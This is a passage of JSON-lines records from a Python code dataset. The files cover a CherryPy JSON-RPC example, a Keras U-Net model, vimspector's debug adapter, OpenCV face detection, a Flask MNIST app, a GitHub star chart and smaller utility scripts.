np.percentile(vs,q)","sub_path":"stat_tests.py","file_name":"stat_tests.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"407145718","text":"import cherrypy\nimport simplejsonrpc\n\nimport methods\n\nsimplejsonrpc.registry.register_method('multiply', methods.multiply)\nsimplejsonrpc.registry.register_method('shlex', methods.shlex)\n\n# from http://tools.cherrypy.org/wiki/DirectToDiskFileUpload\ndef noBodyProcess():\n \"\"\"Sets cherrypy.request.process_request_body = False, giving\n us direct control of the file upload destination. By default\n cherrypy loads it to memory, we are directing it to disk.\"\"\"\n cherrypy.request.process_request_body = False\n\ncherrypy.tools.noBodyProcess = cherrypy.Tool('before_request_body', noBodyProcess)\n\nclass JsonRpcService:\n \"\"\" Request handler for JSON-RPC requests. \"\"\"\n\n exposed = True\n\n def __init__(self):\n self.handler = simplejsonrpc.handler.RequestHandler()\n\n def handle_response(self, status, response_headers):\n cherrpy.response.status = status\n cherrpy.response.headers.update(response_headers)\n\n @cherrypy.expose\n @cherrypy.tools.noBodyProcess()\n def index(self, **whatever):\n return self.handler.handle_request(\n cherrypy.request,\n cherrypy.request.body.fp.read(),\n self.handle_response)\n\nif __name__ == '__main__':\n cherrypy.quickstart(JsonRpcService())\n","sub_path":"examples/cherrpy.py","file_name":"cherrpy.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"254589238","text":"# SilNet is referenced from U-Net segmentation.\n# It used three 2-strided convolutions and three deconvolutions.\nimport cv2\nimport os\nfrom keras.optimizers import Adam\nfrom keras.layers import *\nfrom keras.models import Model\n\nfrom GeoConGAN.SilNet.unet.data import *\n\nfrom PIL import Image\n\n\nresult_path = \"./unet/data/result\"\n\n\nclass DataLoader:\n def __init__(self, batch_size, paths):\n self.batch_size = batch_size\n self.paths = paths\n self.n_batch = 0\n self.load_path()\n\n def load_path(self):\n self.path_trainA = os.listdir(self.paths[0])\n self.path_trainB = os.listdir(self.paths[1])\n\n self.path_testA = os.listdir(self.paths[2])\n self.path_testB = os.listdir(self.paths[3])\n\n print(self.path_trainA)\n print(self.path_trainB)\n print(self.path_testA)\n print(self.path_testB)\n\n def data_load(self, is_train=True):\n\n if is_train:\n path_a = self.path_trainA\n path_b = self.path_trainB\n root_a = self.paths[0]\n root_b = self.paths[1]\n\n else:\n path_a = self.path_testA\n path_b = self.path_testB\n root_a = self.paths[2]\n root_b = self.paths[3]\n\n\n self.n_batch = int(min(len(path_a)//self.batch_size, len(path_b)//self.batch_size))\n\n #idx = np.random.choice(self.n_batch*self.batch_size, self.n_batch*self.batch_size, replace=False)\n\n for n in range(self.n_batch):\n imgs_A = []\n imgs_B = []\n for i in range(self.batch_size):\n img_A = imread(os.path.join(root_a, path_a[n*self.batch_size + i]))\n img_B = imread(os.path.join(root_b, path_b[n*self.batch_size + i]))\n\n imgs_A.append(img_A)\n imgs_B.append(img_B)\n\n imgs_A = np.array(imgs_A)/127.5 - 1\n imgs_B = np.array(imgs_B)/127.5 - 1\n\n yield imgs_A, imgs_B\n\n\ndef imread(path):\n image = np.array(Image.open(path))\n if image.shape[0] == 512:\n image.resize((256,256,1))\n\n image = image.reshape((256,256,1))\n return image\n\n\nclass SilNet:\n\n def __init__(self, shape, train_generator, data_loader, batch_size):\n self.shape = shape\n self.model = self.make_model2()\n self.compile_model()\n self.train_generator = train_generator\n self.test_generator = data_loader\n self.batch_size = batch_size\n\n def make_model(self):\n def normalization():\n return BatchNormalization()\n def conv(input_layer, filter):\n c = Conv2D(filters=filter, kernel_size=3, strides=1, padding='same')(input_layer)\n a = ReLU()(c)\n n = normalization()(a)\n c = Conv2D(filters=filter, kernel_size=3, strides=2, padding='same')(n)\n return c\n def resnet(input_layer, filter):\n n = normalization()(input_layer)\n a = ReLU()(n)\n c = Conv2D(filters=filter, kernel_size=5, strides=1, padding='same')(a)\n n = normalization()(c)\n a = ReLU()(n)\n c = Conv2D(filters=filter, kernel_size=5, strides=1, padding='same')(a)\n return Add()([input_layer, c])\n\n def deconv2d(input_layer, filter, concat):\n upsample = UpSampling2D(size=2)(input_layer)\n merge = concatenate([upsample,concat],axis=3)\n conv2d_layer = Conv2D(filters=filter, kernel_size=3, strides=1, padding='same')(merge)\n n = normalization()(conv2d_layer)\n return n\n filter_size = 64\n input_layer = Input(self.shape)\n\n\n conv_layer_1 = Conv2D(filters=filter_size, kernel_size=3, strides=1, padding='same')(input_layer)\n a = ReLU()(conv_layer_1)\n n = normalization()(a)\n conv_layer_2 = Conv2D(filters=filter_size, kernel_size=3, strides=2, padding='same')(n)\n a = ReLU()(conv_layer_2)\n n = normalization()(a)\n\n conv_layer_3 = Conv2D(filters=filter_size*2, kernel_size=3, strides=1, padding='same')(n)\n a = ReLU()(conv_layer_3)\n n = normalization()(a)\n conv_layer_4 = Conv2D(filters=filter_size*2, kernel_size=3, strides=2, padding='same')(n)\n\n res_net = resnet(conv_layer_4, filter_size*2)\n for i in range(0, 5):\n res_net = resnet(res_net, filter_size*2)\n\n deconv_1 = deconv2d(res_net, filter_size*2, conv_layer_3)\n deconv_2 = deconv2d(deconv_1, filter_size, conv_layer_1)\n\n output_layer = Conv2D(filters=1, kernel_size=1, strides=1, padding='same', activation='tanh')(deconv_2)\n\n return Model(inputs=input_layer, outputs=output_layer)\n\n def compile_model(self):\n self.model.compile(optimizer=Adam(lr=1e-4), loss='binary_crossentropy', metrics=['accuracy'])\n\n def train_on_batch(self, epoch):\n for epoch_idx in range(0, epoch):\n## for idx, (input_image, label) in enumerate(self.data_loader.data_load()):\n## loss = self.model.train_on_batch(input_image, label)\n loss = self.model.fit_generator(self.train_generator, steps_per_epoch=300, epochs=5)\n\n print(loss)\n self.test_save(epoch_idx)\n\n def make_model2(self):\n def normalize_layer():\n return BatchNormalization()\n\n filters = 64\n input_layer = Input(self.shape)\n c1 = Conv2D(filters=filters, kernel_size=3, padding='same',strides=1, activation='relu')(input_layer)\n n = normalize_layer()(c1)\n c1 = Conv2D(filters=filters, kernel_size=3, padding='same',strides=1, activation='relu')(n)\n n = normalize_layer()(c1)\n c1_d = Conv2D(filters=filters, kernel_size=3, padding='same',strides=2, activation='relu')(n)\n n = normalize_layer()(c1_d)\n# max_pool = MaxPooling2D()(n)\n\n c2 = Conv2D(filters=filters*2, kernel_size=3, padding='same',strides=1, activation='relu')(n)\n n = normalize_layer()(c2)\n c2 = Conv2D(filters=filters*2, kernel_size=3, padding='same',strides=1, activation='relu')(n)\n n = normalize_layer()(c2)\n c2_d = Conv2D(filters=filters*2, kernel_size=3, padding='same',strides=2, activation='relu')(n)\n n = normalize_layer()(c2_d)\n# max_pool = MaxPooling2D()(n)\n\n c3 = Conv2D(filters=filters*4, kernel_size=3, padding='same', strides=1, activation='relu')(n)\n n = normalize_layer()(c3)\n c3 = Conv2D(filters=filters*4, kernel_size=3, padding='same', strides=1, activation='relu')(n)\n\n up_sample = concatenate([Conv2DTranspose(filters=filters*2, kernel_size=2,strides=2,padding='same')(c3), c2],axis=3)\n\n c4 = Conv2D(filters=filters*2, kernel_size=3, padding='same', strides=1, activation='relu')(up_sample)\n n = normalize_layer()(c4)\n c4 = Conv2D(filters=filters*2, kernel_size=3, padding='same', strides=1, activation='relu')(n)\n\n up_sample = concatenate([Conv2DTranspose(filters=filters, kernel_size=2,strides=2,padding='same')(c4), c1],axis=3)\n\n\n c5 = Conv2D(filters=filters, kernel_size=3, padding='same', strides=1, activation='relu')(up_sample)\n n = normalize_layer()(c5)\n c5 = Conv2D(filters=filters, kernel_size=3, padding='same', strides=1, activation='relu')(n)\n\n output = Conv2D(filters=1, kernel_size=1, padding='same',strides=1, activation='tanh')(c5)\n\n return Model(inputs=input_layer, outputs=output)\n\n def test_save(self, epoch_idx):\n os.makedirs(result_path+\"/{0}\".format(epoch_idx), exist_ok=True)\n\n for i, (image, label) in enumerate(self.test_generator.data_load(False)):\n\n results = self.model.predict(image)\n\n results = (results + 1) * 127.5\n\n for b in range(self.batch_size):\n result = np.asarray(results[b], dtype=np.uint8)\n save_path = result_path+\"/{0}/result_{1}.png\".format(epoch_idx, i*self.batch_size+b)\n\n result = cv2.cvtColor(result,cv2.COLOR_GRAY2RGB)\n result = cv2.cvtColor(result,cv2.COLOR_RGB2GRAY)\n cv2.imwrite(save_path, result)\n '''\n result_image = Image.fromarray(result)\n result_image.save(result_path+\"/{0}/result_{1}.png\".format(epoch_idx, i*self.batch_size+b))\n '''\n\nif __name__ == \"__main__\":\n paths = [\n \"./unet/data/train/input\",\n \"./unet/data/train/label\",\n \"./unet/data/test/input\",\n \"./unet/data/test/label\"\n ]\n\n data_gen_args = dict(rotation_range=0.2,\n width_shift_range=0.05,\n height_shift_range=0.05,\n shear_range=0.05,\n zoom_range=0.05,\n horizontal_flip=True,\n fill_mode='nearest',\n validation_split=0.2)\n data_loader = DataLoader(batch_size=4, paths=paths)\n\n myGene = trainGenerator(4,'./unet/data/train','input','label',data_gen_args,save_to_dir = None)\n silnet = SilNet((256,256,1), myGene, data_loader, 4)\n silnet.model.summary()\n silnet.train_on_batch(500)\n Conv2DTranspose()\n","sub_path":"GeoConGAN/SilNet/silnet.py","file_name":"silnet.py","file_ext":"py","file_size_in_byte":9124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"433479613","text":"# vimspector - A multi-language debugging system for Vim\n# Copyright 2018 Ben Jackson\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport json\n\nfrom collections import namedtuple\n\nfrom vimspector import utils\n\nPendingRequest = namedtuple( 'PendingRequest',\n [ 'msg', 'handler', 'failure_handler' ] )\n\n\nclass DebugAdapterConnection( object ):\n def __init__( self, handler, send_func ):\n self._logger = logging.getLogger( __name__ )\n utils.SetUpLogging( self._logger )\n\n self._Write = send_func\n self._SetState( 'READ_HEADER' )\n self._buffer = bytes()\n self._handler = handler\n self._next_message_id = 0\n self._outstanding_requests = {}\n\n def DoRequest( self, handler, msg, failure_handler=None ):\n this_id = self._next_message_id\n self._next_message_id += 1\n\n msg[ 'seq' ] = this_id\n msg[ 'type' ] = 'request'\n\n self._outstanding_requests[ this_id ] = PendingRequest( msg,\n handler,\n failure_handler )\n self._SendMessage( msg )\n\n def Reset( self ):\n self._Write = None\n self._handler = None\n\n def OnData( self, data ):\n data = bytes( data, 'utf-8' )\n # self._logger.debug( 'Received ({0}/{1}): {2},'.format( type( data ),\n # len( data ),\n # data ) )\n\n self._buffer += data\n\n while True:\n if self._state == 'READ_HEADER':\n data = self._ReadHeaders()\n\n if self._state == 'READ_BODY':\n self._ReadBody()\n else:\n break\n\n if self._state != 'READ_HEADER':\n # We ran out of data whilst reading the body. Await more data.\n break\n\n def _SetState( self, state ):\n self._state = state\n if state == 'READ_HEADER':\n self._headers = {}\n\n def _SendMessage( self, msg ):\n msg = json.dumps( msg )\n self._logger.debug( 'Sending Message: {0}'.format( msg ) )\n\n data = 'Content-Length: {0}\\r\\n\\r\\n{1}'.format( len( msg ), msg )\n # self._logger.debug( 'Sending: {0}'.format( data ) )\n self._Write( data )\n\n def _ReadHeaders( self ):\n parts = self._buffer.split( bytes( '\\r\\n\\r\\n', 'utf-8' ), 1 )\n\n if len( parts ) > 1:\n headers = parts[ 0 ]\n for header_line in headers.split( bytes( '\\r\\n', 'utf-8' ) ):\n if header_line.strip():\n key, value = str( header_line, 'utf-8' ).split( ':', 1 )\n self._headers[ key ] = value\n\n # Chomp (+4 for the 2 newlines which were the separator)\n # self._buffer = self._buffer[ len( headers[ 0 ] ) + 4 : ]\n self._buffer = parts[ 1 ]\n self._SetState( 'READ_BODY' )\n return\n\n # otherwise waiting for more data\n\n def _ReadBody( self ):\n try:\n content_length = int( self._headers[ 'Content-Length' ] )\n except KeyError:\n # Ug oh. We seem to have all the headers, but no Content-Length\n # Skip to reading headers. Because, what else can we do.\n self._logger.error( 'Missing Content-Length header in: {0}'.format(\n json.dumps( self._headers ) ) )\n self._buffer = bytes( '', 'utf-8' )\n self._SetState( 'READ_HEADER' )\n return\n\n if len( self._buffer ) < content_length:\n # Need more data\n assert self._state == 'READ_BODY'\n return\n\n payload = str( self._buffer[ : content_length ], 'utf-8' )\n self._buffer = self._buffer[ content_length : ]\n\n message = json.loads( payload )\n\n self._logger.debug( 'Message received: {0}'.format( message ) )\n\n try:\n self._OnMessageReceived( message )\n finally:\n # Don't allow exceptions to break message reading\n self._SetState( 'READ_HEADER' )\n\n def _OnMessageReceived( self, message ):\n if not self._handler:\n return\n\n if message[ 'type' ] == 'response':\n request = self._outstanding_requests.pop( message[ 'request_seq' ] )\n\n if message[ 'success' ]:\n if request.handler:\n request.handler( message )\n else:\n reason = message.get( 'message' )\n if not message:\n fmt = message.get( 'body', {} ).get( 'error', {} ).get( 'format' )\n if fmt:\n # TODO: Actually make this work\n reason = fmt\n else:\n message = 'No reason'\n\n self._logger.error( 'Request failed: {0}'.format( reason ) )\n if request.failure_handler:\n request.failure_handler( reason, message )\n else:\n utils.UserMessage( 'Request failed: {0}'.format( reason ) )\n elif message[ 'type' ] == 'event':\n method = 'OnEvent_' + message[ 'event' ]\n if method in dir( self._handler ):\n getattr( self._handler, method )( message )\n else:\n utils.UserMessage( 'Unhandled event: {0}'.format( message[ 'event' ] ),\n persist = True )\n","sub_path":"python3/vimspector/debug_adapter_connection.py","file_name":"debug_adapter_connection.py","file_ext":"py","file_size_in_byte":5408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"602968818","text":"import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom sklearn.metrics import r2_score, mean_absolute_error, mean_squared_error\nfrom sklearn import linear_model\nimport sys\nfrom tqdm import tqdm\nfrom cycler import cycler\nimport string\nfrom itertools import cycle\n\n\ndef label_axes(fig, labels=None, loc=None, **kwargs):\n if labels is None:\n labels = string.ascii_lowercase\n labels = cycle(labels)\n if loc is None:\n loc = (-0.1, 1.1)\n axes = [ax for ax in fig.axes if ax.get_label() != '']\n for ax, lab in zip(axes, labels):\n ax.annotate('(' + lab + ')', size=16, xy=loc,\n xycoords='axes fraction',\n **kwargs)\n\n\nplt.style.use(['science', 'grid'])\nprop_cycle = plt.rcParams['axes.prop_cycle']\ncolors = prop_cycle.by_key()['color']\ncolors = [colors[3], colors[1], colors[0]]\ncolors_nipy1 = mpl.cm.nipy_spectral(np.linspace(0.1, 0.9, 6))\ncolors_nipy2 = mpl.cm.nipy_spectral(np.linspace(0.6, 0.9, 7))\ncolors_nipy = list(colors_nipy1[0:3]) + list(colors_nipy2[3:-2]) + list(colors_nipy1[-1:])\nplt.rcParams['axes.prop_cycle'] = cycler(color=colors)\n\ndf_tddft = pd.read_csv('TDDFT_MOPSSAM_test_data.csv')\ndf_mopssam = pd.read_csv('xtb_tddft_calib_data.csv')\n\nfig = plt.figure(num=2, figsize=[7, 4], dpi=300, clear=True)\nax = fig.add_subplot(1, 1, 1)\nplt.plot(df_tddft['S1'], df_mopssam['aug-cc-TDDFT'], '.', color=colors_nipy[1])\nx = np.linspace(0, 10, 100)\nplt.plot(x, x, 'k--')\nplt.xlim(2, 7)\nplt.ylim(2, 7)\nax.set_axisbelow(True)\nplt.grid(True)\nax.set_aspect('equal', adjustable='box')\n# plt.legend(markerscale=6, fontsize=14)\nplt.xlabel('Independent TD-DFT S$_1$ (eV)', fontsize=16)\nplt.ylabel('MOPSSAM S$_1$ (eV)', fontsize=16)\nplt.savefig('mopssam_S1_comp.png')\n","sub_path":"scripts/comp_TDDFT_settings.py","file_name":"comp_TDDFT_settings.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"14519238","text":"import tkinter as tk\r\nimport cv2\r\nimport random\r\n\r\ndef webcam():\r\n video = cv2.VideoCapture(0)\r\n classificador = cv2.CascadeClassifier('cascades/haarcascade_frontalface_alt.xml')\r\n\r\n while True:\r\n conectado, frame = video.read()\r\n # print(conectado)\r\n # print(frame)\r\n\r\n frameCinza = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n facesDetectadas = classificador.detectMultiScale(frameCinza, minSize=(70, 70))\r\n for (x, y, l, a) in facesDetectadas:\r\n cv2.rectangle(frame, (x, y), (x + l, y + a), (0, 0, 255), 2)\r\n\r\n cv2.imshow('Video', frame)\r\n\r\n if cv2.waitKey(1) == ord('q'):\r\n break\r\n\r\n video.release()\r\n cv2.destroyAllWindows()\r\n\r\ndef face():\r\n classificador = cv2.CascadeClassifier('cascades/haarcascade_frontalface_alt.xml')\r\n #classificador = cv2.CascadeClassifier('cascades/haarcascade_frontalcatface.xml')\r\n #classificador = cv2.CascadeClassifier('cascades/cars.xml')\r\n #classificador = cv2.CascadeClassifier('cascades/relogios.xml')\r\n\r\n fotos = ['pessoas/j.jpg', 'pessoas/k.jpg','pessoas/fed.jpg','pessoas/h.jpg','pessoas/abc.jpg', 'pessoas/def.jpg', 'pessoas/cba.jpg', 'pessoas/beatles.jpg', 'pessoas/faceolho.jpg', 'pessoas/pessoas1.jpg', 'pessoas/pessoas2.jpg', 'pessoas/pessoas3.jpg', 'pessoas/pessoas4.jpg']\r\n #fotos = ['pessoas/carro1.jpg', 'pessoas/carro2.jpg', 'pessoas/carro3.jpg']\r\n #fotos = ['pessoas/gato1.jpg', 'pessoas/gato2.jpg', 'pessoas/gato3.jpg']\r\n\r\n imagem = cv2.imread(random.choice(fotos))\r\n imagemCinza = cv2.cvtColor(imagem, cv2.COLOR_BGR2GRAY)\r\n\r\n facesDetectadas = classificador.detectMultiScale(imagemCinza, scaleFactor=1.1, minNeighbors=9, minSize=(30, 30))\r\n\r\n for (x, y, l, a) in facesDetectadas:\r\n imagem = cv2.rectangle(imagem, (x, y), (x + l, y + a), (0, 0, 255), 2)\r\n\r\n cv2.imshow(\"Faces encontradas\", imagem)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n\r\njanela = tk.Tk()\r\njanela.title('Captura de Faces')\r\njanela['bg'] = 'gray'\r\nbt1 = tk.Button(janela, width=20, text='Webcam', command=webcam)\r\nbt1.place(x=80, y=150)\r\nbt2 = tk.Button(janela, width=20, text='Imagens', command=face)\r\nbt2.place(x=80, y=180)\r\nbt3 = tk.Button(janela, width=20, text = 'Sair', command=janela.destroy)\r\nbt3.place(x=80, y=210)\r\njanela.geometry('300x300+200+200')\r\n\r\nimg = tk.PhotoImage(file='pessoas/tst.png')\r\nimg1 = tk.Label(janela, imag = img)\r\nimg1.place(x=100, y=30)\r\n#lb = tk.Label(janela, text='oi')\r\n#lb.place(x=100, y=100)\r\n\r\njanela.mainloop()\r\n\r\n","sub_path":"computerVision/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"227319525","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2013 - Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom mistral.db.v2.sqlalchemy import models\nfrom mistral.openstack.common import log as logging\nfrom mistral.tests import base\nfrom mistral.workbook import parser as spec_parser\nfrom mistral.workflow import direct_workflow as d_wf\nfrom mistral.workflow import states\nfrom mistral.workflow import utils as wf_utils\n\nLOG = logging.getLogger(__name__)\n\nWORKBOOK = \"\"\"\n---\nversion: '2.0'\n\nname: my_wb\n\nworkflows:\n wf1:\n type: direct\n\n tasks:\n task1:\n action: std.echo output=\"Hey\"\n publish:\n res1: <% $.task1 %>\n on-complete:\n - task2: <% $.res1 = 'Hey' %>\n - task3: <% $.res1 = 'Not Hey' %>\n\n task2:\n action: std.echo output=\"Hi\"\n\n task3:\n action: std.echo output=\"Hoy\"\n\"\"\"\n\n\nclass DirectWorkflowHandlerTest(base.BaseTest):\n def setUp(self):\n super(DirectWorkflowHandlerTest, self).setUp()\n\n wb_spec = spec_parser.get_workbook_spec_from_yaml(WORKBOOK)\n\n wf_ex = models.WorkflowExecution()\n wf_ex.update({\n 'id': '1-2-3-4',\n 'spec': wb_spec.get_workflows().get('wf1').to_dict(),\n 'state': states.IDLE\n })\n\n self.wf_ex = wf_ex\n self.wb_spec = wb_spec\n self.handler = d_wf.DirectWorkflowHandler(wf_ex)\n\n def _create_db_task(self, id, name, state):\n tasks_spec = self.wb_spec.get_workflows()['wf1'].get_tasks()\n\n task_ex = models.TaskExecution()\n task_ex.update({\n 'id': id,\n 'name': name,\n 'spec': tasks_spec[name].to_dict(),\n 'state': state\n })\n\n self.wf_ex.task_executions.append(task_ex)\n\n return task_ex\n\n def test_start_workflow(self):\n commands = self.handler.start_workflow()\n\n self.assertEqual(1, len(commands))\n self.assertEqual('task1', commands[0].task_spec.get_name())\n self.assertEqual(states.RUNNING, self.wf_ex.state)\n\n def test_on_task_result(self):\n self.wf_ex.update({'state': states.RUNNING})\n\n task1_db = self._create_db_task('1-1-1-1', 'task1', states.RUNNING)\n\n # Emulate finishing 'task1'.\n commands = self.handler.on_task_result(\n task1_db,\n wf_utils.TaskResult(data='Hey')\n )\n\n self.assertEqual(1, len(commands))\n self.assertEqual('task2', commands[0].task_spec.get_name())\n\n self.assertEqual(states.RUNNING, self.wf_ex.state)\n self.assertEqual(states.SUCCESS, task1_db.state)\n\n # Emulate finishing 'task2'.\n task2_db = self._create_db_task('1-1-1-2', 'task2', states.RUNNING)\n\n commands = self.handler.on_task_result(\n task2_db,\n wf_utils.TaskResult(data='Hi')\n )\n\n self.assertEqual(0, len(commands))\n\n self.assertEqual(states.SUCCESS, self.wf_ex.state)\n self.assertEqual(states.SUCCESS, task1_db.state)\n self.assertEqual(states.SUCCESS, task2_db.state)\n\n def test_stop_workflow(self):\n # TODO(rakhmerov): Implement.\n pass\n\n def test_resume_workflow(self):\n # TODO(rakhmerov): Implement.\n pass\n","sub_path":"mistral/tests/unit/workflow/test_direct_workflow.py","file_name":"test_direct_workflow.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"396522720","text":"def merge_excel(input_filename,sheetname_list,output_filename='merge_log.csv',depth_name='DEPTH(m)'):\r\n '''\r\n \r\n '''\r\n import pandas as pd\r\n \r\n rawdata = dict()\r\n # read all excel files\r\n for sheetname in sheetname_list:\r\n rawdata[sheetname] = pd.read_excel(input_filename,sheetname=sheetname)\r\n \r\n # get the min_depth and max_depth \r\n min_depth = max([rawdata[elem][depth_name][0] for elem in rawdata])\r\n max_depth = min([rawdata[elem][depth_name][len(rawdata[elem])-1] for elem in rawdata])\r\n print('mindepth ',min_depth,'max depth ',max_depth)\r\n \r\n # data cleaning, select data between min and max depth\r\n for elem in rawdata:\r\n #print(elem,' raw length',len(rawdata[elem]))\r\n rawdata[elem] =rawdata[elem][(rawdata[elem][depth_name]<= max_depth) & (rawdata[elem][depth_name] >= min_depth) ] #\r\n rawdata[elem]=rawdata[elem].reset_index() #del rawdata[elem]['index']\r\n del rawdata[elem]['index']\r\n #print(elem,' processed length',len(rawdata[elem]))\r\n \r\n # merge to single dataframe \r\n df_logs_merge = pd.DataFrame()\r\n for i,elem in enumerate(rawdata):\r\n columns = list(rawdata[elem].columns.values) \r\n print(columns)\r\n if i>0: # only select depth once\r\n columns.remove(depth_name)\r\n df_logs_merge[columns] = rawdata[elem][columns]\r\n # save to csv file\r\n df_logs_merge.to_csv(output_filename,index=False)\r\n print('merge excel finished')","sub_path":"subfunctions/NMR_ML.py","file_name":"NMR_ML.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"245590617","text":"# When running locally install requirements using\n# pip3 install -t lib -r requirements.txt\n# then run with\n# FLASK_APP=main.py FLASK_DEBUG=1 python -m flask run\n\nimport base64, re\nimport cloud_utils\nimport numpy as np\nfrom flask import Flask, jsonify, request, render_template\nfrom io import BytesIO\nfrom PIL import Image\nfrom googleapiclient import discovery\n\n\napp = Flask(__name__)\n\nservice = discovery.build('ml', 'v1')\n\n@app.route('/')\ndef index():\n return render_template('homepage.html')\n\n\"\"\"\nGeneral Landing Page for projects.\n\"\"\"\n@app.route('/projects')\ndef projects():\n return render_template('projects.html')\n\n\"\"\"\nLA county health scores project.\n\"\"\"\n@app.route('/health_scores')\ndef health_scores():\n return render_template('health_scores.html')\n\n\"\"\"\nDraw a digit and predict with MNIST layers project.\nIf RPC to ML-Engine spin up time is too long, host model locally.\n\"\"\"\n@app.route('/digits', methods=['GET', 'POST'])\ndef digits():\n if request.method == 'POST':\n dataURI = request.data.decode('UTF-8')\n image_data = re.sub('^data:image/png;base64,', '', dataURI)\n drawn_input = Image.open(BytesIO(base64.b64decode(image_data)))\n\n bounding_box = drawn_input.getbbox()\n if bounding_box is None:\n return jsonify(error=\"Draw something first\")\n\n # Expand bounding box, in order to center the image a bit more.\n expansion_coef = (-20, -20, 20, 20)\n enlarged_boundary = [sum(x) for x in zip(bounding_box, expansion_coef)]\n drawn_input = drawn_input.crop(enlarged_boundary)\n drawn_input = drawn_input.resize((28, 28), Image.ANTIALIAS)\n\n # For visualizing the crop and rescale.\n buffered = BytesIO()\n drawn_input.save(buffered, format=\"PNG\")\n data64 = base64.b64encode(buffered.getvalue())\n img_str = u'data:img/png;base64,'+ data64.decode('utf-8')\n\n pixels = list(drawn_input.getdata())\n # For the PNG the color is in the alpha channel. Normalize to [0,1].\n b_w = list(map(lambda rgba: rgba[3]/255.0, pixels))\n data = np.array(b_w)\n data.shape = (28, 28)\n data = data.tolist()\n # Prepare to send to ML Instance.\n req = {\"instances\": [{\"x\": data}]}\n try:\n prediction = cloud_utils.mnist_prediction(service, req)\n top_3 = sorted(enumerate(prediction['predictions'][0]['probabilities']),\n key=lambda x: x[1],\n reverse=True)[0:3]\n return jsonify(prediction=top_3, img_uri=img_str)\n except:\n return jsonify(error=\"Error in the ML Instance, Please try again.\")\n return render_template('digits.html')\n","sub_path":"flask/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"497514715","text":"#most star python project on github \nimport requests\nimport pygal\nfrom pygal.style import LightColorizedStyle as lcs, LightenStyle as ls\n\nurl='https://api.github.com/search/repositories?q=language:Perl&sort=stars'\nr=requests.get(url)\n\nprint('Status code :',r.status_code)\n\nresponse_dict=r.json() \nprint('total_respons_sum :',response_dict['total_count'])\n\nrepo_dicts=response_dict['items']\nprint('itesms sum :',len(repo_dicts))\n\n#repo_dict=repo_dicts[0]\n#print('\\nKeys_sum :',len(repo_dict))\n#print('name: ',repo_dict['name'])\n#print('selected information about each repository')\n#for repo_dict in repo_dicts:\n#\tprint('\\nname :',repo_dict['name'])\n#\tprint('owner :',repo_dict['owner']['login'])\n#\tprint('repository :',repo_dict['html_url'])\n#\tprint('description :',repo_dict['description'])\n\t\nnames,plot_dicts = [],[]\nfor repo_dict in repo_dicts:\n\tnames.append(repo_dict['name'])\n\tplot_dict={\n\t\t'value':repo_dict['stargazers_count'],\n\t\t'label':repo_dict['description'],\n\t\t'xlink':repo_dict['html_url'],\n\t}\n\tplot_dicts.append(plot_dict)\n\t\nmy_style=ls('#336699',base_style=lcs)\nmy_config=pygal.Config()\nmy_config.x_label_rotation=45\nmy_config.show_legend=False\nmy_config.title_font_size=30\nmy_config.label_font_size=20\nmy_config.major_label_font_size=30\nmy_config.truncate_label=15\nmy_config.show_y_guides=False\nmy_config.width=1260\n\nchart = pygal.Bar(my_config,style=my_style)\nchart.title='Most-Star Perl Projects on Github'\nchart.x_labels=names\n\nchart.add('',plot_dicts)\nchart.render_to_file('python_github_Perl.svg')\n","sub_path":"python_repos.py","file_name":"python_repos.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"424609121","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/6/15 23:31\n# @Author : flyhawk\n# @Email : flyhawksz@163.com\n# @File : singleton.py\n# @Software: PyCharm\n\n\nclass Singleton(object):\n def __new__(cls, *args, **kwargs):\n if not hasattr(cls, 'instance'):\n cls.instance = super(Singleton, cls).__new__(cls)\n return cls.instance\n\n\ndef main():\n m1 = Singleton()\n m2 = Singleton()\n print(m1)\n print(m2)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"1.Create Model/singleton.py","file_name":"singleton.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"349636688","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 2 13:11:09 2020\r\n\r\n@author: 